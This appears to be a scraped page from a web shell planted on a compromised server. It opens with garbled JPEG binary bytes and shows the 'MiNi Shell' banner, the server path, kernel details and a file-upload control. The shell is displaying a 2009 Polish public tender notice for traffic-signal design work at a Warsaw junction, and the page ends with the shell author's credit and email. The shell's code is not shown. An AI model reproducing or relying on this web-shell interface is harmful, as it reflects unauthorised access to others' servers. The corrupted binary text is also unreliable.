JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090925/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090925/163813-N-2009.html

<p class="kh_header"><b>Warszawa: Opracowanie dokumentacji do wniosku o wydanie decyzji o zezwoleniu na realizację inwestycji drogowej polegającej na budowie sygnalizacji świetlnej na skrzyżowaniu ulic Radiowej i Kaliskiego wraz z przebudową geometrii skrzyżowania oraz wyjazdów z pętli autobusowej.</b><br>
<b>Numer ogłoszenia: 163813 - 2009; data zamieszczenia: 25.09.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Dzielnicy Bemowo Miasta Stołecznego Warszawy , ul. Powstańców Śląskich 70/359, 01-381 Warszawa, woj. mazowieckie, tel. 022 53-37-970, faks 022 53-37-563.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bemowo.waw.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie dokumentacji do wniosku o wydanie decyzji o zezwoleniu na realizację inwestycji drogowej polegającej na budowie sygnalizacji świetlnej na skrzyżowaniu ulic Radiowej i Kaliskiego wraz z przebudową geometrii skrzyżowania oraz wyjazdów z pętli autobusowej..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> I.	 Przedmiotem zamówienia jest opracowanie dokumentacji do wniosku o wydanie decyzji o zezwoleniu na realizację inwestycji drogowej polegającej na budowie sygnalizacji świetlnej na skrzyżowaniu ulic Radiowej i Kaliskiego wraz z przebudową geometrii skrzyżowania oraz wyjazdów z pętli autobusowej. Projekt winien uwzględniać ścieżkę rowerową w ulicy Radiowej na odcinku od ul. Kaliskiego do ul. Ebro. 

II.	Dokumentacja musi być opracowana w sposób zgodny z ustaleniami określonymi w:


1.	ustawie z dnia 10 kwietnia 2003 r. o szczególnych zasadach przygotowania i realizacji inwestycji w zakresie dróg publicznych,	
2.	ustawie z dnia 7 lipca 1994 r. Prawo budowlane,
3.	ustawie z dnia 29 stycznia 2004 r. Prawo zamówień publicznych,
4.	rozporządzeniu Ministra Infrastruktury z dnia 3 lipca 2003 r. w sprawie szczegółowego zakresu i formy projektu budowlanego,
5.	rozporządzeniu Ministra Infrastruktury z dnia 2 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego,
6.	rozporządzeniu Ministra Infrastruktury z dnia 18 maja 2004 r. w sprawie określenia metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno-użytkowym,
7.	rozporządzeniu Ministra Infrastruktury z dnia 23 czerwca 2003 r. w sprawie informacji dotyczącej bezpieczeństwa i ochrony zdrowia oraz planu bezpieczeństwa i ochrony zdrowia,
8.	wytycznych zawartych w tematycznych przepisach szczegółowych,
			9.	.obowiązujących Polskich Normach,
  	10.	 zasadach wiedzy technicznej,
   11		 niniejszym Opisie przedmiotu zamówienia.

III.	Zamawiający informuje, że preferuje poziom średni w odniesieniu do rozwiązań technologicznych i kosztów.

IV.	Dokumentacja powinna być wykonana w stanie kompletnym z punktu widzenia celu, któremu ma służyć.


V.	Dokumentacja będzie służyć jako opis przedmiotu zamówienia do przetargu w oparciu o ustawę Prawo zamówień publicznych na roboty budowlane oraz realizację robót na jej podstawie.

VI.	Dokumentacja w swojej treści powinna określać technologię robót, materiały i urządzenia w sposób nie utrudniający uczciwej konkurencji.

VII.	Dokumentacja powinna określać parametry techniczne i funkcjonalne przyjętych rozwiązań materiałowych I wybranej technologii.

VIII.	Zamawiający dopuszcza wskazanie w dokumentacji na znak towarowy, patent lub pochodzenie, jeżeli jest to uzasadnione specyfiką przedmiotu zamówienia lub jeśli obowiązek taki wynika z odrębnych przepisów. W takim przypadku przy wskazaniu powinien być dopisek dopuszcza się stosowanie rozwiązań równoważnych, oraz podane parametry równoważności.

IX.	Do opracowania dokumentacji Zamawiający przekazuje :
1.	analizę warunków i bezpieczeństwa ruchu na skrzyżowaniu ulic Kaliskiego i Radiowej 
2.opinię Inżyniera Ruchu nr 361/09 z dnia 27.04.2009 r.
2.Uwagi Biura Drogownictwa i Komunikacji z dnia 08.04.2009.r.

X.	    Zakres zamówienia obejmuje wykonanie:
-	projektu stałej organizacji ruchu wraz z programami sygnalizacyjnymi zatwierdzony przez Inżyniera Ruchu uwzględniający skoordynowanie z istniejącą sygnalizacją świetlną skrzyżowania ulic Radiowej i Ebro 
- 	projektu  sygnalizacji świetlnej - cz. elektryczna, 
- projektu przebudowy kolizji,
- projektu odwodnienia,
- projektu branży drogowej,
- inwentaryzacji zieleni,
- projekt zieleni,
- badania geotechniczne.

XI.	Dokumentacja powinna zawierać:
	1.	Projekt budowlany opracowany w zakresie zgodnym z art. 34 ust. 3 ustawy Prawo budowlane oraz rozporządzeniem Ministra Infrastruktury z dnia 3 lipca 2003 r. obejmujący:
1.1.	projekt zagospodarowania terenu,
1.2.	projekt architektoniczno-budowlany,
1.3.		zbiór odpisów uzgodnień, opinii i pozwoleń wymaganych przepisami       szczegółowymi,
1.4.		uzgodnienia.
	2.	Projekty wykonawcze obejmujące:
2.1.	projekt wykonawczy drogowy, 
2.2.	projekty wykonawcze związane z zagospodarowaniem terenu inwestycji,


2.3		wszystkie niezbędne inwentaryzacje, w tym szczegółowe inwentaryzacje uzbrojenia podziemnego i zieleni 
2.4		projekty wykonawcze odwodnienia jezdni,
2.5.	projekt wykonawczy oświetlenia ulicznego,
2.6.	projekty wykonawcze związane z ewentualną regulacją, zabezpieczeniem, przebudową uzbrojenia podziemnego, dotyczące sieci: wodociągowej, kanalizacyjnej, gazowej, energetycznej, telekomunikacyjnej, cieplnej, technologicznej lub układu komunikacyjnego,
2.7.	projekty wykonawcze dotyczące makroniwelacji i gospodarki masami ziemnymi,
2.8.	inwentaryzację istniejącej zieleni z jej waloryzacją lub opis drzew i krzewów zlokalizowanych na terenie inwestycji tj. ilość z oznaczeniem gatunku i stanu zdrowotnego, oraz jednoznaczne stwierdzenie czy zieleń koliduje z przebiegiem inwestycji wykaz drzew przeznaczonych do wycinki i do przesadzenia.
3.	Plan sytuacyjny z naniesionym pełnym zakresem robót oraz zaznaczonym zakresem robót rozbiórkowych.
4.	Wszystkie niezbędne opinie, uzgodnienia o ile są wymagane (m. in. ZUD, MPWiK, ZDM, ZDM-OŚW., STOEN, TP, MOZG, SPEC, Inż. Ruchu, Zarządca Drogi, Wydział Ochrony Środowiska) i sprawdzenia projektowe w zakresie wynikającym z przepisów, oraz  pozytywną opinię rzeczoznawcy budowlanego stwierdzającego jej wewnętrzne skoordynowanie.
5.	Szczegółowe specyfikacje techniczne zawierające zbiory wymagań w zakresie sposobu wykonania robót budowlanych, obejmujące w szczególności wymagania dotyczące sposobu wykonania i oceny prawidłowości wykonania poszczególnych robót, określenie zakresu prac, które powinny być ujęte w cenach poszczególnych pozycji przedmiaru zgodnie z rozporządzeniem Ministra Infrastruktury z dnia 2 września 2004r.
6.	Szczegółowe przedmiary robót, wykonane w oparciu o dokumentację projektową, zawierające zestawienie przewidywanych do wykonania robót podstawowych w kolejności technologicznej ich wykonania wraz z ich szczegółowym opisem lub wskazaniem podstaw ustalających szczegółowy opis oraz wskazaniem właściwych specyfikacji technicznych wykonania i odbioru robót budowlanych z wyliczeniem i zestawieniem ilości jednostek przedmiarowych robót podstawowych - zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 2 września 2004 r.
7.	Kosztorysy inwestorskie z przedmiarami robót opracowane na zasadach określonych w rozporządzeniu Ministra Infrastruktury z dnia18 maja 2004r. w sprawie określenia metod i podstaw sporządzania kosztorysu inwestorskiego, obliczeń planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno-użytkowym
8.	Informację dotyczącą bezpieczeństwa i ochrony zdrowia ze względu na specyfikę projektowanego obiektu budowlanego, uwzględnianej w planie bezpieczeństwa i ochrony zdrowia zgodnie z rozporządzeniem Ministra Infrastruktury z dnia 23 czerwca 2003 r.
9.	Materiały do wniosku o wydanie decyzji o środowiskowych uwarunkowaniach zgody na realizację przedsięwzięcia z wymaganymi załącznikami, którymi są:
9.1	poświadczona przez właściwy organ kopia mapy ewidencyjnej z zaznaczonym przebiegiem granic terenu, którego dotyczy wniosek oraz obejmująca obszar, na który oddziaływać będzie przedsięwzięcie, zgodnie z art. 46 a ust. 4 pkt. 1 ustawy z dnia 27.04.2001 r. Prawo ochrony środowiska (Dz. U. Nr 62, poz. 627),
9.2	karta informacyjna przedsięwzięcia zawierająca dane, o których mowa w art. 49 ust. 3 ustawy z dnia 27.04.2001 r. Prawo ochrony środowiska (Dz. U. Nr 62, poz. 627), dotyczące:
o	rodzaju, skali i usytuowaniu przedsięwzięcia, w tym głębokości posadowienia przewodów wodociągowych lub kanalizacyjnych, w przypadku przebudowy drogi publicznej, na czym polega   modernizacja (szerokość prowadzonych prac, jaka była nawierzchnia i   na jaką będzie zamieniona),
1.powierzchni zajmowanej nieruchomości, a także obiektu budowlanego oraz dotychczasowym sposobie ich wykorzystywania i pokryciu szatą roślinną,
2.czy w miejscu prowadzenia robót nie było wcześniej obiektów lub urządzeń mogących zanieczyścić grunt (glebę, ziemię) lub wody podziemne,
3.czy prowadzone roboty nie będą kolidować z obiektami sieci  hydrograficznej,
4.rodzaju technologii, w tym sposób i czas (np. pora dzienna) prowadzenia prac ziemnych oraz ustosunkowanie się do konieczności odwodnienia wykopów budowlanych i ewentualnego sposobu jego prowadzenia,
5.ewentualnych wariantów przedsięwzięcia,
6.przewidywanej ilości wykorzystywanej wody i innych wykorzystywanych surowców, materiałów paliw oraz energii - zarówno w trakcie realizacji jak eksploatacji przedsięwzięcia,
7.rozwiązaniach chroniących środowisko, m.in.
7.1.jeżeli   wystąpią   kolizje   i  konieczność  usunięcia  drzew  należy  określić kompensację przyrodniczą (dotyczy wycięcia) tj. określić miejsce nowych nasadzeń w liczbie nie mniejszej niż liczba usuwanych drzew i krzewów lub wskazać miejsca posadzenia drzew (dotyczy drzew zakwalifikowanych do przesadzenia),
7.2.opisać zabezpieczenie drzew na czas realizacji inwestycji w     części podziemnej i naziemnej zgodnie ze sztuką ogrodniczą,
7.3.czy w obrębie przewidywanego zasięgu odwodnienia znajdują się ujęcia wód podziemnych, drzewa lub krzewy,
8.rodzajach i przewidywanej ilości wprowadzonych do środowiska substancji lub energii przy zastosowaniu rozwiązań chroniących środowisko, m. in.
9.w przypadku przebudowy ulic, należy podać, czy w związku z  wykonaniem inwestycji wzrośnie emisja lub nastąpi wzrost zużycia surowców,
10.rodzaje i ilość odpadów wytwarzanych na etapie budowy (przebudowy, modernizacji) inwestycji, w tym mas ziemnych przemieszczanych w związku z jej realizacją,
10.1. sposób zagospodarowania odpadów , w tym mas ziemnych,
11.możliwym transgranicznym oddziaływaniu na środowisko,
12.obszarach podlegających ochronie na podstawie ustawy z dnia 16 kwietnia 2004 r. o ochronie przyrody, znajdujących się w zasięgu znaczącego oddziaływania przedsięwzięcia:
12.1.określić (oszacować) odległość od obszarów i obiektów chronionych oraz jednoznacznie opisać oddziaływania na te obszary ze szczególnym uwzględnieniem Obszaru Natura 2000. 


XII.	Dokumentacja powinna zostać opracowana w formie drukowanej w następującej liczbie egzemplarzy:

1.	Projekty budowlane (z kopiami uzgodnień i opinii)		                           - 4 egz.
2.	Projekty wykonawcze (z kopiami uzgodnień i opinii)		              - 5 egz.
3.	Inwentaryzacje							              - 5 egz.
4.	Plansze zbiorcze urządzeń podziemnych			                           - 5 egz.
5.	Plansze robót rozbiórkowych					              - 5 egz.
6.	badania geotechniczne 						              - 3 egz.
7.	Przedmiary robót							              - 5 egz.
8.	Kosztorysy inwestorskie						              - 2 egz.
9.	Specyfikacje techniczne wykonania i odbioru robót 		              - 5 egz.
10.	Informacje dotyczące bezpieczeństwa i ochrony zdrowia	                          - 5 egz.
   11.Oryginały uzgodnień i opinii						   - 1 kpl.
   12.Materiały do wniosku o wydanie decyzji o środowiskowych uwarunkowaniach zgody na realizację przedsięwzięcia z wymaganymi załącznikami                              - 4 egz.                                                                                          
oraz w.w  dokumentacja w formie elektronicznej na dysku CD
(w formacie PDF)								    - 1 kpl.
Zawartość płyty musi być identyczna z wersją papierową (łącznie z podpisami, pieczątkami, uzgodnieniami).

XIII.	Na Jednostce Projektującej ciąży obowiązek uzyskania niezbędnych map i wszystkich pozostałych materiałów, opinii i sprawdzeń rozwiązań projektowych w zakresie wynikającym z przepisów, niezbędnych do wykonania dokumentacji oraz obowiązek wykonania inwentaryzacji zieleni I badań gruntowych terenu inwestycji z określeniem poziomu wód gruntowych.

XIV.	Jednostka Projektująca dostarczy Zamawiającemu dokumentację z  oryginałami wszystkich wymaganych przepisami uzgodnień i opinii.

XV.	Jednostka Projektująca dołączy do dokumentacji:
1.	oświadczenie, że dokumentacja jest wykonana zgodnie z umową, obowiązującymi przepisami Prawo budowlane, rozporządzeniem Ministra Infrastruktury z dnia 3 lipca 2003 r. oraz normami techniczno-budowlanymi i została wykonana w stanie kompletnym z punktu widzenia celu, któremu ma służyć,
2.	kopie uprawnień projektowych i zaświadczeń o przynależności projektantów do samorządu zawodowego.

XVI.	Termin dostarczenia kompletnej dokumentacji w formie papierowej i elektronicznej z wszystkimi uzgodnieniami - 10 miesięcy od podpisania umowy.
XVII.	Jednostka Projektująca dołączy do oferty harmonogram rzeczowo-finansowy wykonania dokumentacji projektowo-kosztorysowej przewidujący w 2009 r. wydatki na poziomie do 56.185,35 zł brutto, a w 2010 r. wydatki na poziomie do 100.000,00 zł brutto..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7, 79.93.30.00-3.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 70.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Oferta musi być zabezpieczona wadium w wysokości  2 500.00 zł<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> a)	spełnią warunki udziału w postępowaniu określone w art. 22 ust. 1 ustawy Prawo zamówień publicznych. W przypadku składania oferty przez Wykonawców ubiegających się wspólnie o udzielenie zamówienia, wyżej wymieniony warunek Wykonawcy mogą spełniać łącznie.
b)	posiadają uprawnienia do wykonania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień. W przypadku składania oferty przez Wykonawców występujących wspólnie, wyżej wymieniony warunek musi być spełniony przez każdego wykonawcę.
c)	posiadają niezbędną wiedzę i doświadczenie w realizacji co najmniej jednej usługi odpowiadającej przedmiotowi zamówienia  tj. usługi z zakresu wykonania projekt budowy ulicy wraz z sygnalizacją świetlną i odwodnieniem o wartości minimum 70 000,00 PLN. W przypadku składania ofert przez Wykonawców ubiegających się wspólnie o udzielenie zamówienia, wyżej wymieniony warunek  musi spełniać co najmniej jeden Wykonawca.
d)	dysponują lub będą dysponować osobami zdolnymi do wykonania zamówienia w tym, co najmniej:
1)	jedną osobę posiadającą uprawnienia budowlane w specjalności drogowej bez ograniczeń uprawniające do projektowania obiektu budowlanego;
2)	jedną osobę posiadającą uprawnienia budowlane  w specjalności  instalacyjnej w zakresie sieci, instalacji i urządzeń wodociągowych i kanalizacyjnych uprawniające do projektowania obiektu budowlanego. Zamawiający dopuści uprawnienia tylko w zakresie  sieci.
3)	jedną osobę posiadającą uprawnienia budowlane  w specjalności  instalacyjnej w zakresie sieci instalacji i urządzeń elektrycznych i elektroenergetycznych uprawniające do projektowania obiektu budowlanego. Zamawiający dopuści uprawnienia tylko w zakresie sieci.
Osoby posiadające wskazane powyżej uprawnienia w Części I pkt 1 lit d) ppkt. 1),  2), 3) SIWZ muszą być wpisane na listę członków właściwej Izby Samorządu Zawodowego Inżynierów Budownictwa w rozumieniu ustawy z dnia 15 grudnia 2000 r. o Samorządach Zawodowych Architektów, Inżynierów Budownictwa oraz Urbanistów (Dz. U. z 2001 r. Nr 5, poz. 42 z późn. zm.). Zamawiający dopuszcza posiadanie uprawnień w różnych specjalizacjach przez tę samą osobę.

Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana zgodnie z formą [spełnia - nie spełnia] w oparciu o oświadczenia i dokumentu złożone przez Wykonawcę w celu potwierdzenia spełnienia warunków udziału w postępowaniu.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> a)	oświadczenie o spełnieniu warunków określonych w art. 22 ust. 1 ustawy Prawo zamówień publicznych - sporządzony wg. załącznika Nr 2 do SIWZ - druk Oświadczenie z art. 22 ust. 1 
      ustawy Prawo zamówień publicznych; W przypadku składania oferty przez Wykonawcó
     występujących wspólnie oświadczenie  składa i podpisuje w imieniu wszystkich Wykonawców
      Pełnomocnik, wpisując w miejscu przeznaczonym na podanie nazwy i adresu Wykonawcy,
      nazwy i adresy wszystkich Wykonawców składających ofertę wspólną.
b)	aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. W przypadku składania oferty przez Wykonawców występujących wspólnie, wyżej wymieniony dokument musi być złożony przez każdego Wykonawcę.
c)	wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych usług wykonywanych w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością usługom , o których mowa w Części I pkt 1 lit c) SIWZ, z podaniem ich wartości, przedmiotu, dat  wykonania i odbiorów- sporządzony wg. załącznika nr 9 do SIWZ - druk Doświadczenie zawodowe. W przypadku składania oferty  przez Wykonawców ubiegających się wspólnie o udzielenie zamówienia, wyżej wymieniony warunek musi spełniać, co najmniej jeden podmiot.
d)	dokumenty potwierdzające, że usługi wymienione w wykazie, o którym mowa w Części I pkt 2 lit. c) SIWZ zostały wykonane należycie. W przypadku składania oferty przez Wykonawców ubiegających się wspólnie o udzielenie zamówienia, wyżej wymieniony warunek musi spełniać, co najmniej jeden podmiot.
e)	wykaz osób, którymi dysponuje lub będzie dysponował Wykonawca, które będą uczestniczyć w wykonaniu zamówienia - sporządzony wg. załącznika nr 8 do SIWZ - druk Potencjał kadrowy. W przypadku składania oferty przez Wykonawców ubiegających się wspólnie o udzielenie zamówienia, wyżej wymieniony warunek Wykonawcy mogą spełniać łącznie.
f)	uprawnienia osób wymienionych w Części I pkt 1 lit d) ppkt. 1), 2), 3) SIWZ potwierdzające niezbędne kwalifikacje do wykonania przedmiotu zamówienia. W przypadku składania oferty przez Wykonawców ubiegających się wspólnie o udzielenie zamówienia, wyżej wymieniony warunek Wykonawcy mogą spełniać łącznie.
g)	aktualne na dzień składania ofert zaświadczenia o członkostwie we właściwej Izbie Samorządu Zawodowego Inżynierów Budownictwa dla osób wymienionych w Części I pkt 1 lit d) ppkt. 1), 2), 3) SIWZ. W przypadku składania oferty przez Wykonawców ubiegających się wspólnie o udzielenie zamówienia, wyżej wymieniony warunek Wykonawcy mogą spełniać łącznie..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bemowo.waw.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miasto Stołeczne Warszawa Dzielnica Bemowo, 01-381 Warszawa, ul. Powstańców Śląskich 70, pok. 368, III piętro.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.10.2009 godzina 09:00, miejsce: Miasto Stołeczne Warszawa Dzielnica Bemowo, 01-381 Warszawa, ul. Powstańców Śląskich 70, pok. 368, III piętro.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com